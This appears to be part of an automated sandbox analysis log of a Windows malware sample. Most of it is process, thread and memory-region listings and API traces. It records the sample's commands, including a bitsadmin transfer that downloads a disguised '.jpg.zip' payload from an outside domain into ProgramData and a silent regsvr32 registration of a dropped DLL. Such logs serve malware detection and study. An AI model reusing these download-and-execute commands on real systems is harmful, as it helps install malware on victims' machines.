[0085.080] WshShell:IDispatch:Invoke (in: This=0x2a8064, dispIdMember=1610809345, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [1]=0xcea58*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x1d74600), [2]=0xcea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=" ", varVal2=0x1d74600), [3]=0xcea78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=" /s \"C:\\ProgramData\\tempa\\marxvxinhhm64.dll\"", varVal2=0x0), [4]=0xcea88*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="regsvr32.exe", varVal2=0x1d74600)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xceab8, puArgErr=0xceab4 | out: pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x3, wReserved1=0xc, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [1]=0xcea58*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x1d74600), [2]=0xcea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=" ", varVal2=0x1d74600), [3]=0xcea78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=" /s \"C:\\ProgramData\\tempa\\marxvxinhhm64.dll\"", varVal2=0x0), [4]=0xcea88*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="regsvr32.exe", varVal2=0x1d74600)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xceab8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xceab4*=0x0) returned 0x0
[0085.164] WshShell:IUnknown:Release (This=0x2a8064) returned 0x1
[0085.165] WshShell:IDispatch:Invoke (This=0x2c5b1c, dispIdMember=1000, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x1d75a40), [1]=0xcea58*(varType=0x3, wReserved1=0x9f7, wReserved2=0xe874, wReserved3=0xc, varVal1=0x0, varVal2=0x0), [2]=0xcea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="cmd /k echo %time% && timeout 4000 > NUL && exit", varVal2=0x1d74600)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xceab8, puArgErr=0xceab4)
Thread:
id = 81
os_tid = 0xabc
Thread:
id = 82
os_tid = 0xac0
Thread:
id = 83
os_tid = 0xac4
Thread:
id = 84
os_tid = 0xac8
Thread:
id = 85
os_tid = 0xacc
Thread:
id = 88
os_tid = 0xad8
Thread:
id = 89
os_tid = 0xadc
Thread:
id = 90
os_tid = 0xae0
Thread:
id = 91
os_tid = 0xae4
Thread:
id = 92
os_tid = 0xae8
Thread:
id = 93
os_tid = 0xaec
Thread:
id = 116
os_tid = 0xb70
Thread:
id = 122
os_tid = 0xba4
Thread:
id = 128
os_tid = 0xbd4
Thread:
id = 134
os_tid = 0xc04
Thread:
id = 140
os_tid = 0xc34
Thread:
id = 146
os_tid = 0xc64
Thread:
id = 152
os_tid = 0xc94
Thread:
id = 161
os_tid = 0xcd0
Thread:
id = 167
os_tid = 0xd14
Thread:
id = 173
os_tid = 0xd70
Thread:
id = 179
os_tid = 0xda0
Thread:
id = 185
os_tid = 0xdd0
Thread:
id = 199
os_tid = 0xe54
Thread:
id = 206
os_tid = 0xe88
Thread:
id = 213
os_tid = 0xebc
Thread:
id = 216
os_tid = 0xf08
Thread:
id = 218
os_tid = 0xf14
Thread:
id = 220
os_tid = 0xf20
Thread:
id = 293
os_tid = 0x508
Process:
id = "7"
image_name = "bitsadmin.exe"
filename = "c:\\windows\\system32\\bitsadmin.exe"
page_root = "0x7f1be620"
os_pid = "0xaf0"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "6"
os_parent_pid = "0xa98"
cmd_line = "\"C:\\Windows\\System32\\bitsadmin.exe\" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhma.jpg.zip?18841737 C:\\ProgramData\\tempa\\marxvxinhhma.jpg"
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1022
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1023
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1024
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1025
start_va = 0x110000
end_va = 0x14ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 1026
start_va = 0xcf0000
end_va = 0xd33fff
entry_point = 0xcf0000
region_type = mapped_file
name = "bitsadmin.exe"
filename = "\\Windows\\System32\\bitsadmin.exe" (normalized: "c:\\windows\\system32\\bitsadmin.exe")
Region:
id = 1027
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1028
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1029
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 1030
start_va = 0x7ffdb000
end_va = 0x7ffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdb000"
filename = ""
Region:
id = 1031
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 1032
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1033
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1034
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1035
start_va = 0x150000
end_va = 0x217fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000150000"
filename = ""
Region:
id = 1036
start_va = 0x260000
end_va = 0x26ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000260000"
filename = ""
Region:
id = 1037
start_va = 0x2c0000
end_va = 0x3bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000002c0000"
filename = ""
Region:
id = 1038
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1039
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1040
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1041
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1042
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1043
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1044
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1045
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1046
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1047
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1048
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1049
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1050
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1051
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1052
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 1053
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1054
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1055
start_va = 0xc0000
end_va = 0xc6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 1056
start_va = 0xd0000
end_va = 0xd1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 1057
start_va = 0xe0000
end_va = 0xe0fff
entry_point = 0xe0000
region_type = mapped_file
name = "bitsadmin.exe.mui"
filename = "\\Windows\\System32\\en-US\\bitsadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\bitsadmin.exe.mui")
Region:
id = 1058
start_va = 0xf0000
end_va = 0xf0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 1059
start_va = 0x100000
end_va = 0x100fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 1060
start_va = 0x3c0000
end_va = 0x4c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003c0000"
filename = ""
Region:
id = 1061
start_va = 0xd40000
end_va = 0x193ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000d40000"
filename = ""
Region:
id = 1062
start_va = 0x4d0000
end_va = 0x52bfff
entry_point = 0x4d0000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1063
start_va = 0x4d0000
end_va = 0x52bfff
entry_point = 0x4d0000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1064
start_va = 0x74fc0000
end_va = 0x74fcbfff
entry_point = 0x74fc0000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1065
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1066
start_va = 0x4d0000
end_va = 0x6effff
entry_point = 0x0
region_type = private
name = "private_0x00000000004d0000"
filename = ""
Region:
id = 1067
start_va = 0x4d0000
end_va = 0x5aefff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004d0000"
filename = ""
Region:
id = 1068
start_va = 0x6b0000
end_va = 0x6effff
entry_point = 0x0
region_type = private
name = "private_0x00000000006b0000"
filename = ""
Region:
id = 1069
start_va = 0x220000
end_va = 0x220fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000220000"
filename = ""
Region:
id = 1070
start_va = 0x770c0000
end_va = 0x77142fff
entry_point = 0x770c0000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1071
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1072
start_va = 0x230000
end_va = 0x230fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000230000"
filename = ""
Region:
id = 1073
start_va = 0x7e0000
end_va = 0x81ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 1074
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 1075
start_va = 0x650000
end_va = 0x68ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000650000"
filename = ""
Region:
id = 1076
start_va = 0x74b40000
end_va = 0x74b55fff
entry_point = 0x74b40000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1077
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 1078
start_va = 0x270000
end_va = 0x2abfff
entry_point = 0x270000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1079
start_va = 0x270000
end_va = 0x2abfff
entry_point = 0x270000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1080
start_va = 0x270000
end_va = 0x2abfff
entry_point = 0x270000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1081
start_va = 0x270000
end_va = 0x2abfff
entry_point = 0x270000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1082
start_va = 0x270000
end_va = 0x2abfff
entry_point = 0x270000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1083
start_va = 0x748e0000
end_va = 0x7491afff
entry_point = 0x748e0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1084
start_va = 0x820000
end_va = 0xaeefff
entry_point = 0x820000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1085
start_va = 0x75060000
end_va = 0x7506dfff
entry_point = 0x75060000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 1086
start_va = 0x270000
end_va = 0x2affff
entry_point = 0x0
region_type = private
name = "private_0x0000000000270000"
filename = ""
Region:
id = 1087
start_va = 0x5b0000
end_va = 0x5effff
entry_point = 0x0
region_type = private
name = "private_0x00000000005b0000"
filename = ""
Region:
id = 1088
start_va = 0x7ffda000
end_va = 0x7ffdafff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffda000"
filename = ""
Region:
id = 1089
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 1127
start_va = 0x6f8b0000
end_va = 0x6f8b8fff
entry_point = 0x6f8b0000
region_type = mapped_file
name = "qmgrprxy.dll"
filename = "\\Windows\\System32\\qmgrprxy.dll" (normalized: "c:\\windows\\system32\\qmgrprxy.dll")
Thread:
id = 94
os_tid = 0xaf4
[0060.394] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fa3c | out: lpSystemTimeAsFileTime=0x14fa3c*(dwLowDateTime=0xd4a91470, dwHighDateTime=0x1d469c7))
[0060.394] GetCurrentProcessId () returned 0xaf0
[0060.394] GetCurrentThreadId () returned 0xaf4
[0060.394] GetTickCount () returned 0x1d1af
[0060.394] QueryPerformanceCounter (in: lpPerformanceCount=0x14fa34 | out: lpPerformanceCount=0x14fa34*=1813434000000) returned 1
[0060.395] GetModuleHandleA (lpModuleName=0x0) returned 0xcf0000
[0060.395] __set_app_type (_Type=0x1)
[0060.395] __p__fmode () returned 0x757a31f4
[0060.395] __p__commode () returned 0x757a31fc
[0060.395] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd17f33) returned 0x0
[0060.395] __wgetmainargs (in: _Argc=0xd30824, _Argv=0xd3082c, _Env=0xd30828, _DoWildCard=0, _StartInfo=0xd30838 | out: _Argc=0xd30824, _Argv=0xd3082c, _Env=0xd30828) returned 0
[0060.396] _onexit (_Func=0xd1925e) returned 0xd1925e
[0060.396] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0060.396] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0060.396] AitLogFeatureUsageByApp () returned 0x0
[0060.397] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0060.397] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0060.397] VerifyVersionInfoW (in: lpVersionInformation=0x14f8b0, dwTypeMask=0x3, dwlConditionMask=0x1b | out: lpVersionInformation=0x14f8b0) returned 1
[0060.397] SetLastError (dwErrCode=0x0)
[0060.397] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0060.397] GetProcAddress (hModule=0x75370000, lpProcName="HeapSetInformation") returned 0x753c4157
[0060.397] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0060.397] GetCurrentProcess () returned 0xffffffff
[0060.397] GetCurrentThread () returned 0xfffffffe
[0060.397] GetCurrentProcess () returned 0xffffffff
[0060.397] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0xd1c3b0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0xd1c3b0*=0x80) returned 1
[0060.398] SetConsoleCtrlHandler (HandlerRoutine=0xd074cb, Add=1) returned 1
[0060.398] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0060.398] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadUILanguage") returned 0x753c24c2
[0060.398] SetThreadUILanguage (LangId=0x0) returned 0x409
[0060.398] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437"
[0060.399] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437"
[0060.399] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437"
[0060.400] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437"
[0060.400] _wcsicmp (_String1="/transfer", _String2="/RAWRETURN") returned 2
[0060.400] _wcsicmp (_String1="/transfer", _String2="/WRAP") returned -3
[0060.400] _wcsicmp (_String1="/transfer", _String2="/NOWRAP") returned 6
[0060.400] swprintf_s (in: _Dst=0x14f9a8, _SizeInWords=0x12, _Format="%u.%u.%u" | out: _Dst="7.5.7601") returned 8
[0060.400] GetFileType (hFile=0x7) returned 0x2
[0060.401] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f91c | out: lpMode=0x14f91c) returned 1
[0060.401] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f94c, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14f94c*=0x2) returned 1
[0060.401] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x24, lpNumberOfCharsWritten=0x14f958, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14f958*=0x24) returned 1
[0060.401] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x14f95c, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14f95c*=0x1e) returned 1
[0060.402] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x29, lpNumberOfCharsWritten=0x14f960, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14f960*=0x29) returned 1
[0060.402] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f964, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14f964*=0x2) returned 1
[0060.402] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x5e, lpNumberOfCharsWritten=0x14f968, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14f968*=0x5e) returned 1
[0060.402] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x58, lpNumberOfCharsWritten=0x14f96c, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14f96c*=0x58) returned 1
[0060.403] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f970, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14f970*=0x2) returned 1
[0060.403] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0060.415] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0060.415] GetNumberOfConsoleInputEvents (in: hConsoleInput=0x3, lpNumberOfEvents=0x14f9bc | out: lpNumberOfEvents=0x14f9bc) returned 1
[0060.415] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0060.415] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xd1c3a8 | out: lpMode=0xd1c3a8) returned 1
[0060.415] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xd1c390 | out: lpConsoleScreenBufferInfo=0xd1c390) returned 1
[0060.415] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0xd1c38c | out: lpMode=0xd1c38c) returned 1
[0060.416] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0060.416] _wcsicmp (_String1="/transfer", _String2="/HELP") returned 12
[0060.416] _wcsicmp (_String1="/transfer", _String2="/?") returned 53
[0060.416] _wcsicmp (_String1="/transfer", _String2="/UTIL") returned -1
[0060.416] _wcsicmp (_String1="/transfer", _String2="/LIST") returned 8
[0060.416] _wcsicmp (_String1="/transfer", _String2="/MONITOR") returned 7
[0060.416] _wcsicmp (_String1="/transfer", _String2="/RESET") returned 2
[0060.416] _wcsicmp (_String1="/transfer", _String2="/TRANSFER") returned 0
[0060.417] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x1) returned 1
[0060.418] _wcsicmp (_String1="/priority", _String2="/UPLOAD") returned -5
[0060.423] _wcsicmp (_String1="/priority", _String2="/DOWNLOAD") returned 12
[0060.423] _wcsicmp (_String1="/priority", _String2="/PRIORITY") returned 0
[0060.424] _wcsicmp (_String1="foreground", _String2="FOREGROUND") returned 0
[0060.424] CoCreateInstance (in: rclsid=0xd065d4*(Data1=0x4991d34b, Data2=0x80a1, Data3=0x4291, Data4=([0]=0x83, [1]=0xb6, [2]=0x33, [3]=0x28, [4]=0x36, [5]=0x6b, [6]=0x90, [7]=0x97)), pUnkOuter=0x0, dwClsContext=0x4, riid=0xd065b4*(Data1=0x5ce34c0d, Data2=0xdc9, Data3=0x4c1f, Data4=([0]=0x89, [1]=0x7c, [2]=0xda, [3]=0xa1, [4]=0xb7, [5]=0x8c, [6]=0xee, [7]=0x7c)), ppv=0xd1c3b4 | out: ppv=0xd1c3b4*=0x2da53c) returned 0x0
[0061.451] IBackgroundCopyManager:CreateJob (in: This=0x2da53c, DisplayName="msd5", Type=0x0, pJobId=0x14f984, ppJob=0x14f980 | out: pJobId=0x14f984*(Data1=0x47681c07, Data2=0xbcc1, Data3=0x450e, Data4=([0]=0xbc, [1]=0x23, [2]=0xf3, [3]=0xdd, [4]=0xe1, [5]=0x2e, [6]=0x9f, [7]=0xab)), ppJob=0x14f980*=0x2da614) returned 0x0
[0061.530] CoTaskMemAlloc (cb=0x50) returned 0x2f0e78
[0061.530] IUnknown:AddRef (This=0x2da614) returned 0x2
[0061.530] IUnknown:AddRef (This=0x2da614) returned 0x3
[0061.530] PeekMessageW (in: lpMsg=0x14f8fc, hWnd=0x0, wMsgFilterMin=0x400, wMsgFilterMax=0x400, wRemoveMsg=0x0 | out: lpMsg=0x14f8fc) returned 0
[0061.530] IUnknown:Release (This=0x2da614) returned 0x2
[0061.530] IBackgroundCopyJob:SetPriority (This=0x2da614, Val=0x0) returned 0x0
[0061.604] IBackgroundCopyJob:AddFile (This=0x2da614, RemoteUrl="http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhma.jpg.zip?18841737", LocalName="C:\\ProgramData\\tempa\\marxvxinhhma.jpg") returned 0x0
[0061.630] IBackgroundCopyJob:SetNotifyFlags (This=0x2da614, Val=0xb) returned 0x0
[0061.662] IBackgroundCopyJob:SetNotifyInterface (This=0x2da614, Val=0x2f0e78) returned 0x0
[0061.662] IUnknown:QueryInterface (in: This=0x2f0e78, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x14f400 | out: ppvObject=0x14f400*=0x0) returned 0x80004002
